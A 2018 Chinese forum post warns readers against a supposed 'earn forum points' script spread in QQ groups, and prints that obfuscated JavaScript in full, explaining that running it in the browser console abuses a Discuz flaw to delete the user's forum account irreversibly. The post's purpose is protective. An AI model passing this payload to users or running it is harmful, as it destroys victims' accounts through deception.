警惕所谓的论坛刷积分代码

KasuganoSoras 发表于 2018-11-12 07:58:22 | 查看:263 | 闲聊


这几天在 QQ 群里看到有人传播下面这样一段代码。

location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';

据说在浏览器控制台执行以后就可以获得论坛积分。

但是请千万不要上当,这是骗人的,这其实是 Discuz 论坛通用的一个漏洞,这段代码执行后,将会删除你在论坛的所有账号数据,并且是不可恢复的,没有后悔药。

img

执行了以上代码后,将会再也无法登陆论坛,所以请千万不要上当受骗。

具体可参考:http://www.mcbbs.net/thread-829958-1-1.html
以及:http://www.mcbbs.net/thread-829806-1-1.html
V2EX 也有:https://www.v2ex.com/t/506823

KasuganoSoras 在 2018-11-12 07:58:22 发表了帖子


img


帖子评分

评分是对作者的一种鼓励,您可以在评论框输入 /cs score 分数 附言 对帖子进行评分。

最少 1 分,最大 5 分,评分会消耗自己的积分,不能给自己的帖子评分。

暂时没有人评分!


发表你的评论

回帖时请注意遵守论坛发言规定,请勿恶意灌水。

  回帖倒序排列   匿名回复 您还可以输入 2000  


欢迎来到 ZeroDream 论坛!

您还没有登录噢 :P

登陆以后就可以发帖和回复啦~


系统主题选项

在线人数:Loading...

WebSocket 状态:Loading...